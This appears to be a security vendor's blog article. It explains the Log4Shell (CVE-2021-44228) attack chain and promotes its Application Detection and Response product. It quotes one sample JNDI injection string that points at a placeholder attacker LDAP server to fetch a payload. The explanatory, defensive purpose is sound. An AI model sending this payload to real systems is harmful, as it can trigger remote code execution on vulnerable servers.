Anatomy of an Attack

0

In today’s rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the infamous Log4Shell vulnerability as an example, and demonstrates how Application Detection and Response (ADR) technology effectively safeguards against such zero-day threats.

View the Contrast ADR white paper

To illustrate the complexity and severity of modern application attacks, let’s examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021. This attack is a prime example of attack chaining, leveraging JNDI Injection, Expression Language (EL) Injection and Command Injection.

Technology note: The CVE program catalogs, which publicly disclose computer security flaws, are maintained by MITRE. Each CVE entry has a unique identifier, making it easier for IT professionals to share information about vulnerabilities across different security tools and services.

The Log4Shell vulnerability affects Log4j, a ubiquitous Java logging framework. The attack begins when a malicious actor sends a specially crafted request to a vulnerable application. This request contains a Java Naming and Directory Interface (JNDI) lookup string in a format like this:

${jndi:ldap://attacker-controlled-server.com/payload}

Technology note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory functionality to Java applications. It allows Java applications to discover and look up data and objects via a name, which can be exploited in certain vulnerabilities like Log4Shell. In this context, it’s being abused to initiate a connection to a malicious server.

When the vulnerable Log4j version processes this string, it interprets the JNDI expression part as an expression to be evaluated. This evaluation causes the application to perform a JNDI lookup, reaching out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server specified in the string.

Technology note: Log4j is a popular Java-based logging framework developed by Apache. It’s widely used in Java applications for logging various types of data and events.

The attacker’s LDAP server responds with an EL injection payload. Due to the nature of JNDI and how Log4j processes the response, this payload is treated as an EL expression to be evaluated.

The EL expression typically contains malicious code designed to exploit the EL interpreter. This could include commands to download and execute additional malware, exfiltrate data, or establish a backdoor in the system.

Technology note: Expression Language (EL) is a scripting language that allows access to application data. EL injection occurs when an attacker can manipulate or inject malicious EL expressions, potentially leading to code execution. EL injection vulnerabilities are a recurring theme among zero-day vulnerabilities, either directly or indirectly through chained attacks as in this example.

As the EL interpreter evaluates the injected expression, it executes the malicious code within the context of the vulnerable application. This gives the attacker a foothold into the system, often with the same privileges as the application itself.

What makes the Log4Shell vulnerability particularly severe is the widespread use of the Log4j library and how easy it was to exploit the vulnerability. It carries the following concerns:

This anatomy of the Log4Shell attack demonstrates why application layer attacks are so potent and why protection mechanisms like Application Detection and Response (ADR) — explained below in depth — are crucial for detecting and preventing such sophisticated attacks.

See how to eliminate your application blindspot with Contrast ADR (video)

With initial access established, attackers can leverage this position to use additional tactics to accomplish other objectives, such as:

Before we dive into the details of ADR, it’s crucial to understand how it addresses a significant gap in many organizations’ security strategies: the lack of robust application-level threat detection.

Many organizations rely on WAFs as their primary defense against application-level threats. However, this approach has several critical limitations:

Technology note: A WAF is a security tool that monitors, filters and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to help protect web applications from various attacks, such as Cross-Site Scripting (XSS) and SQL injection.

Technology note: WAF bypasses are techniques attackers use to render WAF security controls ineffective. These include methods to sneak malicious payloads past the WAF’s signature-based protections, or outright avoidance of the WAF entrypoint to the application. It is important to have a defense-in-depth strategy when it comes to AppSec and not rely on a single control to ensure security of the application layer.

EDR solutions focus on monitoring and protecting individual endpoints within an organization. While crucial for overall security, EDR has its own set of limitations when it comes to application security:

Technology note: EDR is a cybersecurity technology that continuously monitors and responds to threats on endpoint devices such as computers, laptops and mobile devices. EDR solutions collect and analyze data from endpoints to enable security operations teams to detect, investigate and mitigate suspicious activities and potential security breaches. They typically provide real-time visibility, threat detection and automated response capabilities, focusing on endpoint-level activities rather than application-specific behaviors.

ADR technology addresses these limitations by working within the application itself. This approach offers several key advantages:

Technology note: ADR is a security approach that focuses on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR works within the application itself, providing deeper visibility into application behavior and more accurate threat detection.

Contrast Security employs innovative ADR technology to detect and prevent attacks like Log4Shell at multiple stages. Let’s understand the architecture that makes this possible and examine how it plays out in practice.

Contrast ADR uses agent-based architecture, integrating directly with the application runtime:

Contrast Runtime Security identifies the malicious JNDI lookup attempt by enhancing the JVM’s security settings to prevent abuse of JNDI capabilities.

Contrast Runtime Security identifies EL injection attempts and protects against them by enhancing the JVM’s security settings to prevent abuse of the JVM’s EL processor capabilities.

In the unlikely event that malicious code is loaded, the Contrast Runtime Security Platform utilizes:

To better understand how Contrast’s ADR technology works in practice, let’s examine a series of events from a replicated Log4Shell attack detection.

Note: All behavioral rules are set to MONITOR mode, not BLOCK mode, for this example to illustrate attacker exploit chaining and the defense-in-depth detection capabilities of Contrast’s ADR. Normally, these rules would be set to BLOCK mode, catching and blocking the initial JNDI exploit, and preventing the subsequent events from occurring in the first place.

This detailed breakdown demonstrates Contrast ADR’s ability to:

This level of insight is critical to prevent attacks and understand new threat patterns.

When Contrast ADR detects a potential Log4Shell exploitation attempt, it triggers a comprehensive response that aligns with the NIST Cybersecurity Framework:

Technology note: SIEM (Security Information and Event Management) is a system that collects and analyzes log data from various sources across an organization’s IT infrastructure. It helps in real-time analysis of security alerts generated by applications and network hardware. Some SIEM examples include Splunk, QRadar and Microsoft Sentinel.

Technology note: XDR (Extended Detection and Response) is a holistic security approach that collects and automatically correlates data across multiple security layers — email, endpoints, servers, cloud workloads and networks. It uses analytics to detect threats and automatically respond to them, providing a more comprehensive and efficient way to detect, investigate and respond to cybersecurity incidents across the entire IT ecosystem.

Throughout this process, the ADR system maintains continuous monitoring, provides real-time updates to security dashboards, and supports compliance reporting by documenting all detection and response actions taken.

The integration of ADR technology with existing Security Information and Event Management (SIEM); security orchestration, automation and response (SOAR); and Extended Detection and Response (XDR) systems creates a powerful synergy that enhances overall security operations. Here’s how ADR can fit into and augment SIEM//SOAR/XDR-driven workflows:

By integrating ADR into the SIEM/SOAR/XDR ecosystem, organizations achieve more comprehensive threat detection, faster incident response and more effective vulnerability management, significantly enhancing their overall security posture.

Implementing Contrast’s ADR technology translates into tangible business benefits:

Note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.

Note: GDPR (General Data Protection Regulation) is a regulation in EU law on data protection and privacy in the European Union and the European Economic Area. It also addresses the transfer of personal data outside the EU and EEA areas.

As cyber threats continue to evolve, network-based application security measures are no longer sufficient to protect critical applications and data. Contrast’s ADR technology offers a robust, intelligent and proactive approach to application security.

By understanding the anatomy of modern attacks and leveraging cutting-edge ADR solutions, organizations can significantly enhance their security posture, minimize risk and stay ahead of emerging threats. As a security decision-maker, investing in ADR technology is not just a security measure — it’s a strategic imperative for safeguarding your organization’s digital assets in today’s threat landscape.

To learn more about how ADR technology can protect your organization and see its capabilities in action, request a demo of Contrast ADR.

By taking these steps, you’ll be well on your way to strengthening your application security and staying ahead of evolving cyber threats.

Note: This article is authored by Jonathan Harper, Principal Solutions Engineer at Contrast Security, with over five years of experience in application security. Jonathan has supported large enterprises and previously held roles at Threat Stack, Veracode, and Micron Technology.

LEAVE A REPLY

Please enter your comment!
Please enter your name here